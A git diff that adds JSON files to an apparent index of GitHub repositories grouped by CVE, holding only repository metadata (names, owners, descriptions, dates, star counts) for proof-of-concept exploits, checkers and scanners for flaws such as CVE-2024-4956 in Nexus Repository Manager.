"forks": 23, + "watchers": 116, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 904220023, + "name": "CVE-2024-49039", + "full_name": "Alexandr-bit253\/CVE-2024-49039", + "owner": { + "login": "Alexandr-bit253", + "id": 102812557, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102812557?v=4", + "html_url": "https:\/\/github.com\/Alexandr-bit253", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Alexandr-bit253\/CVE-2024-49039", + "description": null, + "fork": false, + "created_at": "2024-12-16T13:25:56Z", + "updated_at": "2024-12-17T03:30:47Z", + "pushed_at": "2024-12-16T13:28:19Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-49112.json b/2024/CVE-2024-49112.json new file mode 100644 index 0000000000..5403e38e63 --- /dev/null +++ b/2024/CVE-2024-49112.json @@ -0,0 +1,64 @@ +[ + { + "id": 904227549, + "name": "poc_monitor", + "full_name": "tnkr\/poc_monitor", + "owner": { + "login": "tnkr", + "id": 24298003, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24298003?v=4", + "html_url": "https:\/\/github.com\/tnkr", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tnkr\/poc_monitor", + "description": "A short scraper looking for a POC of CVE-2024-49112", + "fork": false, + "created_at": "2024-12-16T13:41:40Z", + "updated_at": "2025-01-03T19:33:51Z", + "pushed_at": "2024-12-16T19:35:02Z", + "stargazers_count": 13, + "watchers_count": 13, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 13, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 911216391, + "name": "CVE-2024-49112", + "full_name": "CCIEVoice2009\/CVE-2024-49112", + "owner": { + "login": "CCIEVoice2009", + "id": 71173516, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/71173516?v=4", + "html_url": "https:\/\/github.com\/CCIEVoice2009", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/CCIEVoice2009\/CVE-2024-49112", + "description": null, + "fork": false, + "created_at": "2025-01-02T14:02:33Z", + "updated_at": "2025-01-03T02:32:24Z", + "pushed_at": "2025-01-02T14:04:01Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-49113.json b/2024/CVE-2024-49113.json new file mode 100644 index 0000000000..cc7dc85fce --- /dev/null +++ b/2024/CVE-2024-49113.json @@ -0,0 +1,126 @@ +[ + { + "id": 910842302, + "name": "CVE-2024-49113", + "full_name": "SafeBreach-Labs\/CVE-2024-49113", + "owner": { + "login": "SafeBreach-Labs", + "id": 19378730, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/19378730?v=4", + "html_url": "https:\/\/github.com\/SafeBreach-Labs", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/SafeBreach-Labs\/CVE-2024-49113", + "description": "LdapNightmare is a PoC tool that tests a vulnerable Windows Server against CVE-2024-49113", + "fork": false, + "created_at": "2025-01-01T15:48:38Z", + "updated_at": "2025-01-07T19:31:09Z", + "pushed_at": "2025-01-02T16:07:23Z", + "stargazers_count": 396, + "watchers_count": 396, + "has_discussions": false, + "forks_count": 92, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 92, + "watchers": 396, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 911503737, + "name": "CVE-2024-49113-Checker", + "full_name": "barcrange\/CVE-2024-49113-Checker", + "owner": { + "login": "barcrange", + "id": 83610130, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/83610130?v=4", + "html_url": "https:\/\/github.com\/barcrange", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/barcrange\/CVE-2024-49113-Checker", + "description": null, + "fork": false, + "created_at": "2025-01-03T07:05:33Z", + "updated_at": "2025-01-07T15:44:47Z", + "pushed_at": "2025-01-03T08:20:03Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 912234380, + "name": "CVE-2024-49113", + "full_name": "YoonJae-rep\/CVE-2024-49113", + "owner": { + "login": "YoonJae-rep", + "id": 191003786, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/191003786?v=4", + "html_url": "https:\/\/github.com\/YoonJae-rep", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/YoonJae-rep\/CVE-2024-49113", + "description": "CVE-2024-49113에 대한 익스플로잇. Windows Lightweight Directory Access Protocol(LDAP)의 취약성.", + "fork": false, + "created_at": "2025-01-05T01:32:03Z", + "updated_at": "2025-01-06T08:04:48Z", + "pushed_at": "2025-01-06T08:04:45Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 912790659, + "name": "CVE-2024-49113-Checker", + "full_name": "Sachinart\/CVE-2024-49113-Checker", + "owner": { + "login": "Sachinart", + "id": 18497191, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18497191?v=4", + "html_url": "https:\/\/github.com\/Sachinart", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Sachinart\/CVE-2024-49113-Checker", + "description": "Hi, This is to check targets vulnerable for CVE-2024-49113 in bulk, faster.", + "fork": false, + "created_at": "2025-01-06T11:59:02Z", + "updated_at": "2025-01-06T12:04:05Z", + "pushed_at": "2025-01-06T12:04:02Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-49117.json b/2024/CVE-2024-49117.json new file mode 100644 index 0000000000..1a11ee8cc8 --- /dev/null +++ b/2024/CVE-2024-49117.json @@ -0,0 +1,33 @@ +[ + { + "id": 904940803, + "name": "Microsoft-2024-December-Update-Control", + "full_name": "mutkus\/Microsoft-2024-December-Update-Control", + "owner": { + "login": "mutkus", + "id": 4324026, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4324026?v=4", + "html_url": "https:\/\/github.com\/mutkus", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mutkus\/Microsoft-2024-December-Update-Control", + "description": "Microsoft Windows işletim sistemlerinde ki CVE-2024-49117, CVE-2024-49118, CVE-2024-49122 ve CVE-2024-49124 açıkları için KB kontrolü", + "fork": false, + "created_at": "2024-12-17T21:03:12Z", + "updated_at": "2024-12-17T21:21:36Z", + "pushed_at": "2024-12-17T21:21:32Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-49203.json b/2024/CVE-2024-49203.json new file mode 100644 index 0000000000..e7b0e32af4 --- /dev/null +++ b/2024/CVE-2024-49203.json @@ -0,0 +1,33 @@ +[ + { + "id": 869521489, + "name": "CVE-2024-49203", + "full_name": "CSIRTTrizna\/CVE-2024-49203", + "owner": { + "login": "CSIRTTrizna", + "id": 170928596, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/170928596?v=4", + "html_url": "https:\/\/github.com\/CSIRTTrizna", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/CSIRTTrizna\/CVE-2024-49203", + "description": null, + "fork": false, + "created_at": "2024-10-08T12:42:59Z", + "updated_at": "2024-11-21T12:13:41Z", + "pushed_at": "2024-11-21T12:13:37Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-49328.json b/2024/CVE-2024-49328.json new file mode 100644 index 0000000000..53012bdfcd --- /dev/null +++ b/2024/CVE-2024-49328.json @@ -0,0 +1,33 @@ +[ + { + "id": 884373508, + "name": "CVE-2024-49328", + "full_name": "RandomRobbieBF\/CVE-2024-49328", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2024-49328", + "description": "WP REST API FNS <= 1.0.0 - Privilege Escalation", + "fork": false, + "created_at": "2024-11-06T16:25:59Z", + "updated_at": "2024-12-03T07:30:32Z", + "pushed_at": "2024-11-06T16:28:46Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-49368.json b/2024/CVE-2024-49368.json new file mode 100644 index 0000000000..4c6f4cf1d2 --- /dev/null +++ b/2024/CVE-2024-49368.json @@ -0,0 +1,33 @@ +[ + { + "id": 887035757, + "name": "CVE-2024-49368", + "full_name": "Aashay221999\/CVE-2024-49368", + "owner": { + "login": "Aashay221999", + "id": 43607208, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43607208?v=4", + "html_url": "https:\/\/github.com\/Aashay221999", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Aashay221999\/CVE-2024-49368", + "description": "Explorations of CVE-2024-49368 + Exploit Development", + "fork": false, + "created_at": "2024-11-12T03:50:46Z", + "updated_at": "2024-11-12T03:56:07Z", + "pushed_at": "2024-11-12T03:56:04Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-49369.json b/2024/CVE-2024-49369.json new file mode 100644 index 0000000000..00ffc72b9c --- /dev/null +++ b/2024/CVE-2024-49369.json @@ -0,0 +1,33 @@ +[ + { + "id": 895937915, + "name": "CVE-2024-49369", + "full_name": "Quantum-Sicarius\/CVE-2024-49369", + "owner": { + "login": "Quantum-Sicarius", + "id": 1269538, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1269538?v=4", + "html_url": "https:\/\/github.com\/Quantum-Sicarius", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Quantum-Sicarius\/CVE-2024-49369", + "description": null, + "fork": false, + "created_at": "2024-11-29T08:14:03Z", + "updated_at": "2024-12-11T14:18:34Z", + "pushed_at": "2024-12-11T14:18:30Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-49379.json b/2024/CVE-2024-49379.json new file mode 100644 index 0000000000..2fa0edc9cc --- /dev/null +++ b/2024/CVE-2024-49379.json @@ -0,0 +1,33 @@ +[ + { + "id": 889610570, + "name": "CVE-2024-49379", + "full_name": "OHDUDEOKNICE\/CVE-2024-49379", + "owner": { + "login": "OHDUDEOKNICE", + "id": 38146523, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38146523?v=4", + "html_url": "https:\/\/github.com\/OHDUDEOKNICE", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/OHDUDEOKNICE\/CVE-2024-49379", + "description": "CVE-2024-49379 PoC", + "fork": false, + "created_at": "2024-11-16T19:05:28Z", + "updated_at": "2024-11-20T16:31:11Z", + "pushed_at": "2024-11-16T19:31:50Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-4956.json b/2024/CVE-2024-4956.json new file mode 100644 index 0000000000..aae576d44c --- /dev/null +++ b/2024/CVE-2024-4956.json @@ -0,0 +1,557 @@ +[ + { + "id": 804730274, + "name": "CVE-2024-4956", + "full_name": "banditzCyber0x\/CVE-2024-4956", + "owner": { + "login": "banditzCyber0x", + "id": 96621905, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/96621905?v=4", + "html_url": "https:\/\/github.com\/banditzCyber0x", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/banditzCyber0x\/CVE-2024-4956", + "description": "Nexus Repository Manager 3 Unauthenticated Path Traversal", + "fork": false, + "created_at": "2024-05-23T06:47:13Z", + "updated_at": "2024-07-03T14:20:22Z", + "pushed_at": "2024-05-26T07:52:21Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 804764039, + "name": "CVE-2024-4956", + "full_name": "xungzzz\/CVE-2024-4956", + "owner": { + "login": "xungzzz", + "id": 78672731, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78672731?v=4", + "html_url": "https:\/\/github.com\/xungzzz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/xungzzz\/CVE-2024-4956", + "description": "CVE-2024-4956 Nuclei Template", + "fork": false, + "created_at": "2024-05-23T08:15:08Z", + "updated_at": "2024-05-26T08:07:28Z", + "pushed_at": "2024-05-23T08:16:07Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 804844993, + "name": "CVE-2024-4956", + "full_name": "erickfernandox\/CVE-2024-4956", + "owner": { + "login": "erickfernandox", + "id": 2186082, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2186082?v=4", + "html_url": "https:\/\/github.com\/erickfernandox", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/erickfernandox\/CVE-2024-4956", + "description": "Unauthenticated Path Traversal in Nexus Repository 3 ", + "fork": false, + "created_at": "2024-05-23T11:39:06Z", + "updated_at": "2024-10-04T11:42:50Z", + "pushed_at": "2024-05-23T20:59:10Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 805374933, + "name": "CVE-2024-4956", + "full_name": "gmh5225\/CVE-2024-4956", + "owner": { + "login": "gmh5225", + "id": 13917777, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13917777?v=4", + "html_url": "https:\/\/github.com\/gmh5225", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/gmh5225\/CVE-2024-4956", + "description": "Unauthenticated Path Traversal in Nexus Repository 3 ", + "fork": false, + "created_at": "2024-05-24T12:45:45Z", + "updated_at": "2024-07-21T07:24:48Z", + "pushed_at": "2024-05-23T20:59:10Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 806026716, + "name": "CVE-2024-4956-Bulk-Scanner", + "full_name": "ifconfig-me\/CVE-2024-4956-Bulk-Scanner", + "owner": { + "login": "ifconfig-me", + "id": 25315805, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25315805?v=4", + "html_url": "https:\/\/github.com\/ifconfig-me", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ifconfig-me\/CVE-2024-4956-Bulk-Scanner", + "description": "[CVE-2024-4956] Nexus Repository Manager 3 Unauthenticated Path Traversal Bulk Scanner", + "fork": false, + "created_at": "2024-05-26T06:50:48Z", + "updated_at": "2024-11-23T09:28:58Z", + "pushed_at": "2024-09-26T23:28:20Z", + "stargazers_count": 14, + "watchers_count": 14, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 14, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 806352821, + "name": "CVE-2024-4956-PoC", + "full_name": "thinhap\/CVE-2024-4956-PoC", + "owner": { + "login": "thinhap", + "id": 104897146, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/104897146?v=4", + "html_url": "https:\/\/github.com\/thinhap", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/thinhap\/CVE-2024-4956-PoC", + "description": null, + "fork": false, + "created_at": "2024-05-27T03:09:36Z", + "updated_at": "2024-07-04T01:22:44Z", + "pushed_at": "2024-05-27T03:14:22Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 806592885, + "name": "CVE-2024-4956", + "full_name": "yagyuufellinluvv\/CVE-2024-4956", + "owner": { + "login": "yagyuufellinluvv", + "id": 170684196, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/170684196?v=4", + "html_url": "https:\/\/github.com\/yagyuufellinluvv", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/yagyuufellinluvv\/CVE-2024-4956", + "description": null, + "fork": false, + "created_at": "2024-05-27T13:48:15Z", + "updated_at": "2024-05-27T13:48:15Z", + "pushed_at": "2024-05-27T13:48:15Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 807147595, + "name": "CVE-2024-4956", + "full_name": "GoatSecurity\/CVE-2024-4956", + "owner": { + "login": "GoatSecurity", + "id": 153397256, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/153397256?v=4", + "html_url": "https:\/\/github.com\/GoatSecurity", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/GoatSecurity\/CVE-2024-4956", + "description": "CVE-2024-4956 : Nexus Repository Manager 3 poc exploit", + "fork": false, + "created_at": "2024-05-28T15:05:31Z", + "updated_at": "2024-11-20T16:30:48Z", + "pushed_at": "2024-05-29T11:54:26Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 807309759, + "name": "CVE-2024-4956", + "full_name": "TypicalModMaker\/CVE-2024-4956", + "owner": { + "login": "TypicalModMaker", + "id": 52781429, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/52781429?v=4", + "html_url": "https:\/\/github.com\/TypicalModMaker", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/TypicalModMaker\/CVE-2024-4956", + "description": "Proof-Of-Concept (POC) for CVE-2024-4956", + "fork": false, + "created_at": "2024-05-28T21:20:53Z", + "updated_at": "2024-11-20T16:30:48Z", + "pushed_at": "2024-05-29T07:37:15Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2024-4956", + "exploit", + "poc", + "proof-of-concept", + "proofofconcept", + "vulnerability" + ], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 808014744, + "name": "CVE-2024-4956-Sonatype-Nexus-Repository-Manager", + "full_name": "Praison001\/CVE-2024-4956-Sonatype-Nexus-Repository-Manager", + "owner": { + "login": "Praison001", + "id": 60835238, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60835238?v=4", + "html_url": "https:\/\/github.com\/Praison001", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Praison001\/CVE-2024-4956-Sonatype-Nexus-Repository-Manager", + "description": "Exploit for CVE-2024-4956 affecting all previous Sonatype Nexus Repository 3.x OSS\/Pro versions up to and including 3.68.0", + "fork": false, + "created_at": "2024-05-30T08:04:27Z", + "updated_at": "2024-06-01T11:11:39Z", + "pushed_at": "2024-06-01T11:11:37Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 809568326, + "name": "CVE-2024-4956", + "full_name": "Cappricio-Securities\/CVE-2024-4956", + "owner": { + "login": "Cappricio-Securities", + "id": 102907425, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102907425?v=4", + "html_url": "https:\/\/github.com\/Cappricio-Securities", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Cappricio-Securities\/CVE-2024-4956", + "description": "Sonatype Nexus Repository Manager 3 (LFI)", + "fork": false, + "created_at": "2024-06-03T02:49:20Z", + "updated_at": "2024-08-27T14:29:47Z", + "pushed_at": "2024-06-24T10:14:58Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "bugbounty", + "bugbounty-tool", + "bugbounty-tools", + "cve-2024-4956", + "cve-2024-4956-exploit", + "cve-2024-4956-poc", + "cve-2024-4956-scanner", + "lfi", + "lfi-detection", + "lfi-exploit", + "lfi-exploitation", + "lfi-exploiter", + "lfi-scanner", + "local-file-inclusion", + "sonatype-nexus-repository-manager-3" + ], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 810916474, + "name": "CVE-2024-4956", + "full_name": "fin3ss3g0d\/CVE-2024-4956", + "owner": { + "login": "fin3ss3g0d", + "id": 62859381, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/62859381?v=4", + "html_url": "https:\/\/github.com\/fin3ss3g0d", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/fin3ss3g0d\/CVE-2024-4956", + "description": "CVE-2024-4956 Python exploitation utility", + "fork": false, + "created_at": "2024-06-05T15:37:39Z", + "updated_at": "2024-11-14T20:00:24Z", + "pushed_at": "2024-11-14T20:00:20Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 8, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 812597751, + "name": "CVE-2024-4956", + "full_name": "verylazytech\/CVE-2024-4956", + "owner": { + "login": "verylazytech", + "id": 172168670, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/172168670?v=4", + "html_url": "https:\/\/github.com\/verylazytech", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/verylazytech\/CVE-2024-4956", + "description": "POC - CVE-2024–4956 - Nexus Repository Manager 3 Unauthenticated Path Traversal", + "fork": false, + "created_at": "2024-06-09T10:57:29Z", + "updated_at": "2024-12-30T21:06:51Z", + "pushed_at": "2024-11-26T14:46:24Z", + "stargazers_count": 12, + "watchers_count": 12, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2024-4956-poc", + "nexus-repository-manager", + "unauthenticated-path-traversal" + ], + "visibility": "public", + "forks": 6, + "watchers": 12, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 842584436, + "name": "CVE-2024-4956", + "full_name": "JolyIrsb\/CVE-2024-4956", + "owner": { + "login": "JolyIrsb", + "id": 48220535, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48220535?v=4", + "html_url": "https:\/\/github.com\/JolyIrsb", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/JolyIrsb\/CVE-2024-4956", + "description": null, + "fork": false, + "created_at": "2024-08-14T16:41:01Z", + "updated_at": "2024-08-29T13:31:15Z", + "pushed_at": "2024-08-14T17:44:30Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 863594626, + "name": "Path-Traversal-CVE-2024-4956", + "full_name": "UMASANKAR-MG\/Path-Traversal-CVE-2024-4956", + "owner": { + "login": "UMASANKAR-MG", + "id": 149225998, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/149225998?v=4", + "html_url": "https:\/\/github.com\/UMASANKAR-MG", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/UMASANKAR-MG\/Path-Traversal-CVE-2024-4956", + "description": null, + "fork": false, + "created_at": "2024-09-26T15:05:41Z", + "updated_at": "2024-09-26T15:49:18Z", + "pushed_at": "2024-09-26T15:46:31Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 867826963, + "name": "shirocrack", + "full_name": "An00bRektn\/shirocrack", + "owner": { + "login": "An00bRektn", + "id": 58986498, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/58986498?v=4", + "html_url": "https:\/\/github.com\/An00bRektn", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/An00bRektn\/shirocrack", + "description": "Simple hash cracker for Apache Shiro hashes written in Golang. Useful for exploiting CVE-2024-4956.", + "fork": false, + "created_at": "2024-10-04T19:54:05Z", + "updated_at": "2024-12-06T13:38:19Z", + "pushed_at": "2024-10-04T20:38:27Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 902177937, + "name": "cve-2024-4956", + "full_name": "XiaomingX\/cve-2024-4956", + "owner": { + "login": "XiaomingX", + "id": 5387930, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5387930?v=4", + "html_url": "https:\/\/github.com\/XiaomingX", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/XiaomingX\/cve-2024-4956", + "description": "CVE-2024-4956 Python exploitation utility", + "fork": false, + "created_at": "2024-12-12T04:05:10Z", + "updated_at": "2024-12-13T22:26:06Z", + "pushed_at": "2024-12-12T04:07:35Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-49607.json b/2024/CVE-2024-49607.json new file mode 100644 index 0000000000..112f407e24 --- /dev/null +++ b/2024/CVE-2024-49607.json @@ -0,0 +1,33 @@ +[ + { + "id": 885865765, + "name": "CVE-2024-49607", + "full_name": "RandomRobbieBF\/CVE-2024-49607", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2024-49607", + "description": "WP Dropbox Dropins <= 1.0 - Unauthenticated Arbitrary File Upload", + "fork": false, + "created_at": "2024-11-09T15:46:58Z", + "updated_at": "2025-01-06T13:37:21Z", + "pushed_at": "2024-11-09T15:48:04Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + 